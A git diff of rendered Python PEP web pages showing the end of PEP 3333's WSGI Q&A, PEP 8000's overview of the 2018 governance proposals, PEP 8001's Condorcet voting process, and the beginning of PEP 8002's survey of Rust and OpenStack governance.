    The rationale for requiring a dictionary is to maximize portability +between servers. The alternative would be to define some subset of +a dictionary’s methods as being the standard and portable +interface. In practice, however, most servers will probably find a +dictionary adequate to their needs, and thus framework authors will +come to expect the full set of dictionary features to be available, +since they will be there more often than not. But, if some server +chooses not to use a dictionary, then there will be +interoperability problems despite that server’s “conformance” to +spec. Therefore, making a dictionary mandatory simplifies the +specification and guarantees interoperability.

    +

    Note that this does not prevent server or framework developers from +offering specialized services as custom variables inside the +environ dictionary. This is the recommended approach for +offering any such value-added services.

    +
  2. Why can you call write() and yield bytestrings/return an +iterable? Shouldn’t we pick just one way?

    If we supported only the iteration approach, then current +frameworks that assume the availability of “push” suffer. But, if +we only support pushing via write(), then server performance +suffers for transmission of e.g. large files (if a worker thread +can’t begin work on a new request until all of the output has been +sent). Thus, this compromise allows an application framework to +support both approaches, as appropriate, but with only a little +more burden to the server implementor than a push-only approach +would require.

    +
  3. What’s the close() for?

    When writes are done during the execution of an application +object, the application can ensure that resources are released +using a try/finally block. But, if the application returns an +iterable, any resources used will not be released until the +iterable is garbage collected. The close() idiom allows an +application to release critical resources at the end of a request, +and it’s forward-compatible with the support for try/finally in +generators that’s proposed by PEP 325. (A minimal sketch of this +idiom follows the Q&A list.)

    +
  4. Why is this interface so low-level? I want feature X! (e.g. +cookies, sessions, persistence, …)

    This isn’t Yet Another Python Web Framework. It’s just a way for +frameworks to talk to web servers, and vice versa. If you want +these features, you need to pick a web framework that provides the +features you want. And if that framework lets you create a WSGI +application, you should be able to run it in most WSGI-supporting +servers. Also, some WSGI servers may offer additional services via +objects provided in their environ dictionary; see the +applicable server documentation for details. (Of course, +applications that use such extensions will not be portable to other +WSGI-based servers.)

    +
  5. Why use CGI variables instead of good old HTTP headers? And why +mix them in with WSGI-defined variables?

    Many existing web frameworks are built heavily upon the CGI spec, +and existing web servers know how to generate CGI variables. In +contrast, alternative ways of representing inbound HTTP information +are fragmented and lack market share. Thus, using the CGI +“standard” seems like a good way to leverage existing +implementations. As for mixing them with WSGI variables, +separating them would just require two dictionary arguments to be +passed around, while providing no real benefits.

    +
  6. What about the status string? Can’t we just use the number, +passing in 200 instead of "200 OK"?

    Doing this would complicate the server or gateway, by requiring +them to have a table of numeric statuses and corresponding +messages. By contrast, it is easy for an application or framework +author to type the extra text to go with the specific response code +they are using, and existing frameworks often already have a table +containing the needed messages. So, on balance it seems better to +make the application/framework responsible, rather than the server +or gateway.

    +
  7. Why is wsgi.run_once not guaranteed to run the app only once?

    Because it’s merely a suggestion to the application that it should +“rig for infrequent running”. This is intended for application +frameworks that have multiple modes of operation for caching, +sessions, and so forth. In a “multiple run” mode, such frameworks +may preload caches, and may not write e.g. logs or session data to +disk after each request. In “single run” mode, such frameworks +avoid preloading and flush all necessary writes after each request.

    +

    However, in order to test an application or framework to verify +correct operation in the latter mode, it may be necessary (or at +least expedient) to invoke it more than once. Therefore, an +application should not assume that it will definitely not be run +again, just because it is called with wsgi.run_once set to +True.

    +
  8. Feature X (dictionaries, callables, etc.) is ugly for use in +application code; why don’t we use objects instead?

    All of these implementation choices of WSGI are specifically +intended to decouple features from one another; recombining these +features into encapsulated objects makes it somewhat harder to +write servers or gateways, and an order of magnitude harder to +write middleware that replaces or modifies only small portions of +the overall functionality.

    +

    In essence, middleware wants to have a “Chain of Responsibility” +pattern, whereby it can act as a “handler” for some functions, +while allowing others to remain unchanged. This is difficult to do +with ordinary Python objects, if the interface is to remain +extensible. For example, one must use __getattr__ or +__getattribute__ overrides, to ensure that extensions (such as +attributes defined by future WSGI versions) are passed through. (A +pass-through sketch follows the Q&A list.)

    +

    This type of code is notoriously difficult to get 100% correct, and +few people will want to write it themselves. They will therefore +copy other people’s implementations, but fail to update them when +the person they copied from corrects yet another corner case.

    +

    Further, this necessary boilerplate would be pure excise, a +developer tax paid by middleware developers to support a slightly +prettier API for application framework developers. But, +application framework developers will typically only be updating +one framework to support WSGI, and in a very limited part of +their framework as a whole. It will likely be their first (and +maybe their only) WSGI implementation, and thus they will likely +implement with this specification ready to hand. Thus, the effort +of making the API “prettier” with object attributes and suchlike +would likely be wasted for this audience.

    +

    We encourage those who want a prettier (or otherwise improved) WSGI +interface for use in direct web application programming (as opposed +to web framework development) to develop APIs or frameworks that +wrap WSGI for convenient use by application developers. In this +way, WSGI can remain conveniently low-level for server and +middleware authors, while not being “ugly” for application +developers.

    +
+
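
Returning to question 3, here is a minimal sketch of the close() idiom with a generator, relying on PEP 325-style try/finally support (open_connection() is a hypothetical resource):

+
def application(environ, start_response):
+    conn = open_connection()   # hypothetical resource acquisition
+    start_response('200 OK', [('Content-Type', 'text/plain')])
+    try:
+        yield b'Hello, world!\n'
+    finally:
+        conn.close()   # runs when the server calls close() on the iterable
+
+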
+
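
And for question 8, here is a minimal illustration (not part of WSGI) of the pass-through boilerplate that an attribute-based interface would force on middleware:

+
class PassthroughMiddleware:
+    def __init__(self, wrapped):
+        self._wrapped = wrapped
+
+    def process(self, request):
+        # The one function this middleware actually handles.
+        return self._wrapped.process(request)
+
+    def __getattr__(self, name):
+        # Forward everything else, including attributes that might be
+        # defined by future versions of the interface.
+        return getattr(self._wrapped, name)
+
+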
+

Proposed/Under Discussion

+

These items are currently being discussed on the Web-SIG and elsewhere, +or are on the PEP author’s “to-do” list:

+
    +
  • Should wsgi.input be an iterator instead of a file? This would +help for asynchronous applications and chunked-encoding input +streams.
  • +
  • Optional extensions are being discussed for pausing iteration of an +application’s output until input is available or until a callback +occurs.
  • +
  • Add a section about synchronous vs. asynchronous apps and servers, +the relevant threading models, and issues/design goals in these +areas.
  • +
+
+
+

Acknowledgements

+

Thanks go to the many folks on the Web-SIG mailing list whose +thoughtful feedback made this revised draft possible. Especially:

+
    +
  • Gregory “Grisha” Trubetskoy, author of mod_python, who beat up +on the first draft as not offering any advantages over “plain old +CGI”, thus encouraging me to look for a better approach.
  • +
  • Ian Bicking, who helped nag me into properly specifying the +multithreading and multiprocess options, as well as badgering me to +provide a mechanism for servers to supply custom extension data to +an application.
  • +
  • Tony Lownds, who came up with the concept of a start_response +function that took the status and headers, returning a write +function. His input also guided the design of the exception handling +facilities, especially in the area of allowing for middleware that +overrides application error messages.
  • +
  • Alan Kennedy, whose courageous attempts to implement WSGI-on-Jython +(well before the spec was finalized) helped to shape the “supporting +older versions of Python” section, as well as the optional +wsgi.file_wrapper facility, and some of the early bytes/unicode +decisions.
  • +
  • Mark Nottingham, who reviewed the spec extensively for issues with +HTTP RFC compliance, especially with regard to HTTP/1.1 features that +I didn’t even know existed until he pointed them out.
  • +
  • Graham Dumpleton, who worked tirelessly (even in the face of my laziness +and stupidity) to get some sort of Python 3 version of WSGI out, who +proposed the “native strings” vs. “byte strings” concept, and thoughtfully +wrestled through a great many HTTP, wsgi.input, and other +amendments. Most, if not all, of the credit for this new PEP +belongs to him.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3333.rst

+

Last modified: 2023-10-23 19:28:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8000/index.html b/pep-8000/index.html new file mode 100644 index 00000000000..42b22bfc214 --- /dev/null +++ b/pep-8000/index.html @@ -0,0 +1,206 @@ + + + + + + + + PEP 8000 – Python Language Governance Proposal Overview | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8000 – Python Language Governance Proposal Overview

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP provides an overview of the selection process for a new model of +Python language governance in the wake of Guido’s retirement. +Once the governance model is selected, it will be codified in PEP 13.

+

Here is a list of PEPs related to the governance model selection process. +PEPs in the lower 8000s describe the general process for selecting a +governance model.

+
    +
  • PEP 8001 - Python Governance Voting Process

    This PEP describes how the vote for the new governance model will be +conducted. It outlines the voting method, timeline, criteria for +participation, and explicit list of eligible voters.

    +
  • +
  • PEP 8002 - Open Source Governance Survey

    Surveys will be conducted of governance models for similar open source and +free software projects, and summaries of these models will be outlined in +this PEP. These surveys will serve as useful barometers for how such +projects can be successfully governed, and may serve as inspiration for +Python’s own governance model. Python is unique, so it’s expected that it +will have its own spin on governance, rather than directly adopting any of +those surveyed.

    +
  • +
+

PEPs in the 801Xs describe the actual proposals for Python governance. It is +expected that these PEPs will cover the broad scope of governance, and that +differences in details (such as the size of a governing council) will be +covered in the same PEP, rather than in potentially vote-splitting individual +PEPs.

+
    +
  • PEP 8010 - The Technical Leader Governance Model

    This PEP proposes a continuation of the singular technical project +leader model. Also within scope is whether an advisory council aids +or supports the BDFL. This PEP does not name either the next +BDFL, nor members of such an advisory council. For that, see PEP +13.

    +
  • +
  • PEP 8011 - Python Governance Model Lead by Trio of Pythonistas

    This PEP describes a new model of Python governance led by a Trio of Pythonistas +(TOP). It describes the role and responsibilities of the Trio. +This PEP does not name members of the Trio. For that, see PEP 13.

    +
  • +
  • PEP 8012 - The Community Governance Model

    This is a placeholder PEP for a new model of Python governance based on +consensus and voting, without the role of a centralized singular leader or a +governing council. It describes how, when, and why votes are conducted for +decisions affecting the Python language. It also describes the criteria for +voting eligibility.

    +
  • +
  • PEP 8013 - The External Governance Model

    This PEP describes a new model of Python governance based on an external +council who are responsible for ensuring good process. Elected by the core +development team, this council may reject proposals that are not +sufficiently detailed, do not consider all affected users, or are not +appropriate for the upcoming release. This PEP does not name members of +such a council. For that, see PEP 13.

    +
  • +
  • PEP 8014 - The Commons Governance Model

    This PEP describes a new model of Python governance based on a council of +elders who are responsible for ensuring a PEP is supported by a sufficient +majority of the Python community before being accepted. Unlike some of the +other governance PEPs, it explicitly does not specify who has voting +rights and what a majority vote consists of. Instead, this is determined +by the council of elders on a case-by-case basis.

    +
  • +
  • PEP 8015 - Organization of the Python community

    This PEP formalizes the current organization of the Python community +and proposes 3 main changes: formalize the existing concept of +“Python teams”; give more autonomy to Python teams; replace the BDFL +(Guido van Rossum) with a new “Python board” of 3 members which has +limited roles, mostly deciding how a PEP is approved (or rejected).

    +
  • +
  • PEP 8016 - The Steering Council Model

    This PEP proposes a model of Python governance based around a +steering council. The council has broad authority, which they seek +to exercise as rarely as possible; instead, they use this power to +establish standard processes, like those proposed in the other +801x-series PEPs. This follows the general philosophy that it’s +better to split up large changes into a series of small changes that +can be reviewed independently: instead of trying to do everything in +one PEP, we focus on providing a minimal-but-solid foundation for +further governance decisions.

    +
  • +
+

Additional governance models may be added before the final selection.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8000.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8001/index.html b/pep-8001/index.html new file mode 100644 index 00000000000..9bdfd2355d0 --- /dev/null +++ b/pep-8001/index.html @@ -0,0 +1,458 @@ + + + + + + + + PEP 8001 – Python Governance Voting Process | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8001 – Python Governance Voting Process

+
+
Author:
+
Brett Cannon <brett at python.org>, +Christian Heimes <christian at python.org>, +Donald Stufft <donald at stufft.io>, +Eric Snow <ericsnowcurrently at gmail.com>, +Gregory P. Smith <greg at krypto.org>, +Łukasz Langa <lukasz at python.org>, +Mariatta <mariatta at python.org>, +Nathaniel J. Smith <njs at pobox.com>, +Pablo Galindo Salgado <pablogsal at python.org>, +Raymond Hettinger <python at rcn.com>, +Tal Einat <tal at python.org>, +Tim Peters <tim.peters at gmail.com>, +Zachary Ware <zach at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the process for how the new model of Python governance is +selected, in the wake of Guido’s retirement. +Once the model is chosen by the procedures outlined here, it will be codified +in PEP 13.

+
+
+

Motivation and Rationale

+

Guido’s stepping down from the BDFL role left us with a meta-problem of +having to choose how we will choose how the Python project should be +governed from now on.

+

This document presents a concrete proposal for how this choice can be made. +It summarizes discussion and conclusions of the proceedings of a working +group at the core sprint in Redmond in September 2018 (names of all +attendees are listed as authors). This PEP also summarizes a +subsequent thread +that took place on discuss.python.org.

+

The governance situation should be resolved in a timely fashion. +Ideally that should happen by the end of 2018, which would unblock +substantial improvements to be merged in time for Python 3.8. At the +latest, the governance situation needs to be resolved by PyCon US 2019 to +avoid a PR crisis.

+
+
+

Implementation

+
+

What are we voting for?

+

We are voting to choose which governance PEP should be implemented by +the Python project. The list of candidate PEPs is listed in PEP 8000 +and consists of all PEPs numbered in the 801X range.

+

To ensure the vote is legitimate, the aforementioned PEPs must not be +modified during the voting period.

+
+
+

Who gets to vote?

+

Every CPython core developer is invited to vote. In the interest of +transparency and fairness, we are asking core developers to self-select +based on whether the governance situation will affect them directly. +In other words, we are recommending for inactive core developers who +intend to remain inactive to abstain from voting.

+
+
+

When is the vote?

+

November 16th, 2018 to November 30th, 2018 is the official governance +PEP review period. We discourage the PEP authors from making major +substantive changes during this period, although it is expected that +minor tweaks may occur as a result of this discussion period.

+

The vote will happen in a 2-week-long window from December 1st, 2018 +to December 16th, 2018 +(Anywhere on Earth).

+
+
+

Where is the vote?

+

The vote will happen using a “private” poll on the +Condorcet Internet Voting Service. Every committer +will receive an email with a link allowing them to rank the PEPs in their order of +preference.

+

The election will be supervised by Ee Durbin, The PSF Director of Infrastructure.

+

The results of the election, including anonymized ballots, will be made public on +December 17th, after the election has closed.

+

The following settings will be used for the vote in the CIVS system:

+

Name of the poll: Python governance vote (December 2018)

+

Description of the poll:

+
This is the vote to choose how the CPython project will govern
+itself, now that Guido has announced his retirement as BDFL. For
+full details, see <a
+href="https://peps.python.org/pep-8001/">PEP
+8001</a>. Many discussions have occurred under <a
+href="https://discuss.python.org/tags/governance">the "governance"
+tag</a> on discuss.python.org.
+<p>
+All votes must be received <b>by the end of December 16th, 2018, <a
+href="https://en.wikipedia.org/wiki/Anywhere_on_Earth">Anywhere on
+Earth</a></b>. All CPython core developers are <a
+href="https://github.com/python/voters">eligible to vote</a>.
+It is asked that inactive core developers <i>who intend to remain
+inactive</i> abstain from voting.
+<p>
+<b>Note: You can only vote once, and all votes are final.</b> Once
+you click "Submit ranking", it's too late to change your mind.
+<p>
+All ballots will be published at the end of voting, but <b>without
+any names attached</b>. No-one associated with the Python project or
+the PSF will know how you voted, or even whether you voted.
+<p>
+If you have any questions, you can post in <a
+href="https://discuss.python.org/c/committers">the Committers
+topic</a>, on <a href="mailto:python-committers@python.org">the
+python-committers list</a>, or <a
+href="mailto:ee@python.org">contact the vote administrator
+directly</a>.
+<p>
+<h1>Options</h1>
+<p>
+We're selecting between seven PEPs, each proposing a different
+governance model.
+<p>
+The options below include links to the text of each PEP, as well
+as their complete change history. The text of these PEPs was
+frozen on December 1, when the vote started. But if you looked at
+the PEPs before that, they might have changed. Please take the
+time to check the current text of the PEPs if you read an older
+draft.
+<p>
+A "Further discussion" option is also included. It represents the
+option of not making a choice at all at this time, and continuing
+the discussion instead. Including this option lets us demonstrate
+the core team's readiness to move forward.
+<p>
+If you think a proposal is a particularly bad idea, you can
+express that by ranking it below "Further discussion". If you
+think all of the proposals are better than further discussion,
+then you should rank "Further discussion" last.
+
+
+

Candidates (note: linebreaks are significant here):

+
<a href="https://peps.python.org/pep-8010/">PEP 8010: The Technical Leader Governance Model</a> (Warsaw) (<a href="https://github.com/python/peps/commits/main/pep-8010.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8011/">PEP 8011: Python Governance Model Lead by Trio of Pythonistas</a> (Mariatta, Warsaw) (<a href="https://github.com/python/peps/commits/main/pep-8011.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8012/">PEP 8012: The Community Governance Model</a> (Langa) (<a href="https://github.com/python/peps/commits/main/pep-8012.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8013/">PEP 8013: The External Council Governance Model</a> (Dower) (<a href="https://github.com/python/peps/commits/main/pep-8013.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8014/">PEP 8014: The Commons Governance Model</a> (Jansen) (<a href="https://github.com/python/peps/commits/main/pep-8014.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8015/">PEP 8015: Organization of the Python community</a> (Stinner) (<a href="https://github.com/python/peps/commits/main/pep-8015.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8016/">PEP 8016: The Steering Council Model</a> (Smith, Stufft) (<a href="https://github.com/python/peps/commits/main/pep-8016.rst">changelog</a>)
+Further discussion
+
+
+

Options:

+
[x] Private
+[ ] Make this a test poll: read all votes from a file.
+[ ] Do not release results to all voters.
+[x] Enable detailed ballot reporting.
+    [ ] In detailed ballot report, also reveal the identity of the voter with each ballot.
+[ ] Allow voters to write in new choices.
+[ ] Present choices on voting page in exactly the given order.
+[ ] Allow voters to select “no opinion” for some choices.
+[ ] Enforce proportional representation
+
+
+

These options will have the effect of:

+
    +
  • Making the election “private”, or in other words, invite only.
  • +
  • The results of the election will be released to all voters.
  • +
  • The contents of every ballot will be released to the public, along +with a detailed report going over how the winner was elected.
  • +
  • The detailed ballots will not include any identifying information +and the email addresses of the voters will be thrown away by the CIVS +system as soon as the email with their voting link has been sent.
  • +
  • Voters will not be able to write in new choices, meaning they will +be limited only to the options specified in the election.
  • +
  • Voters will not have the ability to change their vote after casting +a ballot. [no-changes]
  • +
  • The default ordering for each ballot will be randomized to remove +any influence that the order of the ballot may have on the election.
  • +
  • Voters will have to rank all choices somehow, but may rank multiple +choices as equal.
  • +
+
+
+

Voting mechanics

+

The vote will be by ranked ballot. Every voter +orders all candidate PEPs from the most preferred to the least +preferred. The vote will be tallied and a winner chosen using the +Condorcet method.

+

Note: each voter can only cast a single vote with no ability to +revise their vote later. [no-changes] If you are not absolutely +sure of your choices, hold off casting your ballot until later in +the voting period. Votes cast on the last day of the election are +just as valid as the ones cast on the first day.

+

While the CIVS system does not provide an option for a “Pure” +Condorcet election, any Condorcet method will select the “Pure” +Condorcet winner if one exists; the methods differ only when no such +winner exists. The CIVS system differentiates between a Condorcet +winner and a non-Condorcet winner by stating whether the winner was a +Condorcet winner, or whether it merely wasn’t defeated by any other +option. So a winner in the CIVS system will only be accepted if +it states it was a Condorcet winner.

+

In the unlikely case of a tie (or cycle as is possible under the +Condorcet method), a new election will be opened, limited to the +options involved in the tie or cycle, to select a new winner from +amongst the tied options. This new election will be open for a +week, and will be repeated until a single winner is determined.

+
+
+
+

Questions and Answers

+
+

Why the Condorcet method?

+
    +
  1. It allows voters to express preference by ranking PEPs
  2. It is consensus decision-making
  3. In a poll +open to only core developers and run using Approval voting, it was +the clear preference
+
+
+

Is omitting any candidate PEPs in the ranking allowed?

+

A vote which omits candidates in the ranking is invalid. This is +because such votes are incompatible with the desired properties listed +above, namely:

+
    +
  • Making voters consider alternatives, as well as
  • +
  • Doing everything possible to reach a conclusion in a single election.
  • +
+
+
+

Why recommend for dormant core developers to not vote?

+

The choice of the governance model will have far reaching and long-term +consequences for Python and its community. We are inviting core +developers to assess their skin in the game.

+

Note: this is not an edict and will not be policed. We trust all +members of the core team to act in the best interest of Python.

+
+
+

Why should the vote be private?

+

When discussing the election system, a number of core developers expressed +concerns with the idea of having public ballots, with at least one core +developer stating that they were planning on abstaining from voting +altogether due to the use of a public ballot. A poll run on Discourse +identified that the overwhelming majority of voters prefer private ballots. +[private-vote]

+

A secret ballot is considered by many to be a requirement for a free and +fair election, allowing members to vote their true preferences without +worry about social pressure or possible fallout for how they may have +voted.

+
+
+

Why the use of CIVS?

+

In the resulting discussion of this PEP, it was determined that core +developers wished to have a secret ballot. [private-vote] Unfortunately +a secret ballot requires either novel cryptography or a trusted party to +anonymize the ballots. Since no such cryptographic system for Condorcet +ballots is known to exist, the CIVS system was chosen to +act as a trusted party.

+

More information about the security and privacy afforded by CIVS, including +how a malicious voter, election supervisor, or CIVS administrator can +influence the election can be found +here.

+
+
+

Why cannot voters change their vote?

+

CIVS does not allow voters to update their vote; this is part of its +goal of preventing the election supervisor from being able to influence +the votes.

+
+
+

Are there any deficiencies in the Condorcet method?

+

There is no perfect voting method. It has been shown by the +Gibbard-Satterthwaite theorem +that any single-winner ranked voting method which is not dictatorial +must be susceptible to so-called “tactical voting”. This can lead to +people not voting as they truly believe in order to influence the +outcome.

+

The Condorcet method also has the possibility of having cycles (known as +the Condorcet paradox). +Because the Condorcet method chooses a winner based on whether +they would win against the other options in a 1-on-1 race, there is a +possibility that PEP A > PEP B > PEP C > PEP A (or in terms of the game +rock-paper-scissors, imagine a three-player game where someone played rock, +another played paper, and the last person played scissors; no one wins that +game as everyone is defeated by someone). For one analyzed set of real-world +elections with 21 voters or more, a cycle occurred +less than 1.5% of the time.

+
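
To make the cycle concrete, here is a small illustrative tally (purely an example, not part of the CIVS machinery) of three ranked ballots that produce no Condorcet winner:

+
from itertools import combinations
+
+# Three ballots, each ranking the options from most to least preferred.
+ballots = [['A', 'B', 'C'],
+           ['B', 'C', 'A'],
+           ['C', 'A', 'B']]
+
+def pairwise_winner(x, y):
+    # x beats y if a majority of ballots rank x above y.
+    x_wins = sum(b.index(x) < b.index(y) for b in ballots)
+    return x if 2 * x_wins > len(ballots) else y
+
+for x, y in combinations('ABC', 2):
+    print(x, 'vs', y, '->', pairwise_winner(x, y))
+# A beats B and B beats C, yet C beats A: a cycle, so no Condorcet winner.
+
+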
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8001.rst

+

Last modified: 2023-10-09 23:43:15 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8002/index.html b/pep-8002/index.html new file mode 100644 index 00000000000..b51aa247f27 --- /dev/null +++ b/pep-8002/index.html @@ -0,0 +1,1114 @@ + + + + + + + + PEP 8002 – Open Source Governance Survey | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8002 – Open Source Governance Survey

+
+
Author:
+
Barry Warsaw <barry at python.org>, Łukasz Langa <lukasz at python.org>, +Antoine Pitrou <solipsis at pitrou.net>, Doug Hellmann <doug at doughellmann.com>, +Carol Willing <willingc at gmail.com>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP surveys existing and similar open source and free software projects +for their governance models, providing summaries that will serve as useful +references for Python’s own selection of a new governance model in the wake of +Guido’s retirement.

+

Rather than an individual PEP for each of these community surveys, they will +all be collected here in this PEP.

+
+
+

Rationale

+

CPython is not the first open source project to undergo a governance crisis. +Other projects have experimented with various governance options, sometimes several +times during their existence. There are useful lessons to take away from their +experience, which will help inform our own decision.

+
+

Project choice

+

There are many open source projects out there, but it will be most fruitful +to survey those which are similar enough to CPython on a couple of key metrics:

+
    +
  1. the number of contributors and their activity (there are scaling issues that +don’t make the governance models of very small projects very enlightening +for our purposes);
  2. being mostly or partly community-driven (company-driven projects can afford +different governance options, since the company hierarchy has power over +the main participants);
  3. being faced with important design decisions that require a somewhat formal +decision process.
+
+
+
+

Rust

+

The governance structure is documented in Rust RFC #1068.

+

The effective governance process grows organically over time without being entirely +codified as RFCs, especially in case of day-to-day operation details. One example is +the formation of Domain Working Groups in +February 2018.

+
+

Key people and their functions

+

In the Rust project there are teams responsible for certain areas. For language features +there is a “lang team”, for tooling there’s “dev tools” and “Cargo”, and so on. +Contentious issues have facilitators to drive discussion who often aren’t the decision +makers. Typically the facilitators are authors of the proposed changes (see +“Controversial decision process” below). They ensure all key decision makers are +involved along with interested community members. They push towards an agreeable +outcome via iteration.

+

In practice this means decisions are rarely escalated to the core team.

+

The most common role of a contributor is team membership. Issue triage/code review +privileges without team membership is rare. Contributors have full commit access, +code ownership separation is based on trust. Writing to the compiler repository is +frowned upon, all changes go through pull requests and get merged by an integration +bot after they were reviewed and approved.

+

New team members are added by nomination by an existing team member.

+
+
+

Regular decision process

+

Primary work happens via GitHub issues and pull requests. Approving a pull request +by any team member allows it to be merged without further process. All merged pull +requests end up in the next stable version of Rust.

+

Notifying relevant people by mentions is important. Listening to the firehose of +e-mails for all GitHub activity is not popular.

+

There are planning and triage meetings open to the public happening on IRC and Discord. +They are not very popular because most of work happens through GitHub. Discussions also +happen on official Rust forums (https://users.rust-lang.org/ and +https://internals.rust-lang.org/). There is a dedicated moderation team responsible for +taking notes and enforcing code of conduct.

+
+
+

Controversial decision process

+

Larger or controversial work goes through a RFC process. It allows everyone to express their thoughts and +iterates towards a resolution. At some point when all blocking concerns of relevant +team members are addressed, they sign off on the RFC and it reaches a “final comment +period”. That does not require consensus amongst all participants, rather there should +not be a strong consensus against the proposal.

+

After 10 days the RFC is merged unless any new blocking concerns are raised by team +members. A “merge” signifies that work towards implementing the feature and integrating +it can now happen without interruption. An RFC doesn’t have to have a reference +implementation for it to be accepted.

+

The other possible results of the “final comment period” are to:

+
    +
  • postpone the RFC (similar to the Deferred status in PEPs),
  • +
  • get it back into discussion if blocking concerns can be addressed, or
  • +
  • close it if blocking concerns are not solvable. When an RFC is marked as +closed, there is a 7-day grace period to debate whether it should be closed.
  • +
+

In practice, registering concerns with an RFC happens very often initially but rarely +causes the RFC to be entirely killed.

+

This process scales well for small-contention changes and/or smaller changes. For the +largest controversial changes the discussion gets unwieldy. This is a topic currently +(as of August 2018) on the minds of the Rust team (see: +“Listening and Trust, part 1”, +“Listening and Trust, part 2”, +“Listening and Trust, part 3”, +“Proposal for a staged RFC process”).

+
+
+

Planning a new release

+

Every six weeks the Rust compiler is released with whatever it contained at the time. +There are no LTS channels or releases yet but this concept is planned to make +redistributors able to keep up with development better.

+

Every few years a so-called “Edition” is released. +Those are milestone releases with full sets of updated documentation and tooling. They +can be backwards incompatible with previous editions. External packages opt into +breaking changes in their crate metadata. The Rust compiler supports all editions that +existed prior to its release. Linking between crates of any supported edition is +possible.

+
+
+

Changes in the process over time

+

The Rust programming language was started by Graydon Hoare who developed it as +a personal project for a few years. When Mozilla started sponsoring the project, +the team slowly grew with Graydon as a BDFL-style figure. He left the project +in 2013, and Rust has functioned without a BDFL since. The RFC process was put in place later. +Initially some design discussions happened during closed-door weekly video meetings, +which were shut down +in May 2015 (before the 1.0 release of Rust) and organically replaced with open discussion +and direct influence of teams.

+

The number of teams is growing in time. The number of technical decisions made by the +core team is decreasing, instead those get delegated to respective teams.

+

The concept of a “final comment period” was introduced to encourage more public +discussion and enable reacting to a change about to being made, instead of having to +revert a rushed decision that was already made.

+
+
+
+

OpenStack

+

The OpenStack Foundation Bylaws lay out the basic structure for +project governance, with Article IV +delegating day-to-day management of the open source project to the +OpenStack Technical Committee (TC), and The TC member policy +defining broadly how the Technical Committee shall be elected. The TC +publishes a set of more detailed governance documents, including the TC charter, which +describes the team structure, precise rules for establishing +eligibility to run for office, and criteria for establishing the +various electorates.

+
+

Key people and their functions

+

The OpenStack community is made up of many distinct project teams, +responsible for producing different components of the software (block +storage management, compute management, etc.) or managing different +parts of the processes the community follows (such as tracking the +release schedule). Each team is led by a Project Team Lead (PTL), +elected by the Active Project Contributors for that project.

+

Active Project Contributors (APCs) are recent contributors to a given +project team. APC status formally requires two things: becoming an +individual member of the OpenStack Foundation (membership is free) and +having a change merged within the last year (two development cycles) +in a repository managed by a project team.

+

The elected PTL serves a term equal to one development cycle (roughly +6 months). There is no restriction on the number of consecutive terms +a person may serve as PTL, and it is common for someone to serve for +several terms in a row. It is also not unusual for a team to have only +one candidate volunteer to serve as PTL for a given cycle, in which +case there is no need for an election.

+

The PTL represents the team in all cases except where they have +explicitly delegated some responsibility. For example, many teams +designate a separate release liaison to manage the release process +for a development cycle. The PTL also serves as a final decision +maker in cases where consensus cannot be reached between the team +members.

+

While the APCs all vote for the PTL of a team, in many other cases +only the core reviewer team will be consulted on policy decisions +for the team. Anyone may review any patch for any OpenStack +project. After someone demonstrates that they have a good grasp of the +technical issues of a project, that they provide useful feedback on +reviews, and that they understand the direction the project is going, +they may be invited to become a member of the core review team. Unlike +in many other communities, this status does not grant them the right +to submit code without having it reviewed. Rather, it asks them to +commit to reviewing code written by other contributors, and to +participate in team decision-making discussions. Asking someone to +become a member of the core review team is a strong indication of +trust.

+

The Technical Committee (TC) is responsible for managing the +development of OpenStack as a whole. The 13 members of the Technical +Committee are directly elected by APCs from all project teams. Each +member serves a term of two development cycles (roughly 1 year), with +the elections split so that only about half of the members’ terms +expire at any time, to ensure continuity. The TC establishes overall +policies, such as the criteria for adding new project teams, the +deprecation policy for Python 2, testing requirements, etc.

+
+
+

Regular decision process

+

All elections for PTL or TC members use https://civs.cs.cornell.edu to +run a Condorcet election. This system was selected because it +emphasizes consensus candidates over strict popularity.

+

The OpenStack contributor community relies on 3 primary tools for +discussion: the openstack-dev mailing list, +a gerrit code review instance at https://review.openstack.org, and a +set of OpenStack-specific IRC channels on Freenode. There are a few teams +whose contributors are based primarily in China, and they have trouble +accessing IRC. Those teams tend to use alternative platforms such as +WeChat, instead.

+

The tool used for discussing any given decision will vary based on its +weight and impact. Everyone is encouraged to use either the mailing +list or gerrit to support asynchronous discussion across a wider range +of timezones and firewalls, especially for publicizing final +decisions for the rest of the community.

+

